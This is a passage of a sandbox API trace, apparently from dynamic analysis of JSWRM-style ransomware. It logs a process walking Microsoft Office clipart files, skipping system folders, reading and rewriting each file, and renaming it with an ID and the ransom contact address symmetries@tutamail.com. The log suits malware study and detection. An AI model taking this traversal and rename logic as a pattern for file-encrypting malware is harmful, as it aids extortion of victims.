Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0076.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0076.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0076.832] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3044, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EN00222_.WMF", cAlternateFileName="")) returned 1 [0076.832] lstrcmpiW (lpString1="EN00222_.WMF", lpString2=".") returned 1 [0076.832] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="..") returned 1 [0076.832] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="...") returned 1 [0076.833] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="windows") returned -1 [0076.833] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="recovery") returned -1 [0076.833] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="perflogs") returned -1 [0076.833] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="documents and settings") returned 1 [0076.833] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.833] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="system volume information") returned -1 [0076.833] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="msocache") returned -1 [0076.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0076.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00222_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00222_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00222_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0076.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0076.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00222_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00222_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00222_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0076.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0076.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0076.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0076.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.833] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12356) returned 1 [0076.834] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3040) returned 0x24d210 [0076.834] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3040, lpOverlapped=0x0) returned 1 [0076.836] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.836] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3040, lpOverlapped=0x0) returned 1 [0076.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.836] CloseHandle (hObject=0x314) returned 1 [0076.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0076.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0076.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0076.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0076.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0076.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0076.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0076.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0076.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.837] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0076.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0076.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0076.837] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EN00242_.WMF", cAlternateFileName="")) returned 1 [0076.837] lstrcmpiW (lpString1="EN00242_.WMF", lpString2=".") returned 1 [0076.837] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="..") returned 1 [0076.837] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="...") returned 1 [0076.838] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="windows") returned -1 [0076.838] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="recovery") returned -1 [0076.838] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="perflogs") returned -1 [0076.838] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="documents and settings") returned 1 [0076.838] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.838] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="system volume information") returned -1 [0076.838] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="msocache") returned -1 [0076.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00242_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00242_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00242_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00242_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00242_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00242_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0076.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0076.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0076.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.838] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6780) returned 1 [0076.838] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a70) returned 0x205850 [0076.839] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1a70, lpOverlapped=0x0) returned 1 [0076.840] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.840] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1a70, lpOverlapped=0x0) returned 1 [0076.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0076.841] CloseHandle (hObject=0x314) returned 1 [0076.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0076.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0076.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0076.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0076.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0076.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0076.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0076.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0076.841] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0076.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0076.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0076.842] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EN00319_.WMF", cAlternateFileName="")) returned 1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2=".") returned 1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="..") returned 1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="...") returned 1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="windows") returned -1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="recovery") returned -1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="perflogs") returned -1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="documents and settings") returned 1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="system volume information") returned -1 [0076.842] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="msocache") returned -1 [0076.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0076.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00319_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00319_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00319_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0076.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00319_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00319_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00319_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0076.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0076.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0076.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.843] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2280) returned 1 [0076.843] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e0) returned 0x20c6c0 [0076.843] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8e0, lpOverlapped=0x0) returned 1 [0076.845] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.845] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8e0, lpOverlapped=0x0) returned 1 [0076.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0076.845] CloseHandle (hObject=0x314) returned 1 [0076.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0076.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0076.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0076.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0076.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0076.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0076.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0076.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0076.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.846] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0076.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0076.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0076.846] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EN00320_.WMF", cAlternateFileName="")) returned 1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2=".") returned 1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="..") returned 1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="...") returned 1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="windows") returned -1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="recovery") returned -1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="perflogs") returned -1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="documents and settings") returned 1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="system volume information") returned -1 [0076.846] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="msocache") returned -1 [0076.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0076.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00320_.WMF", 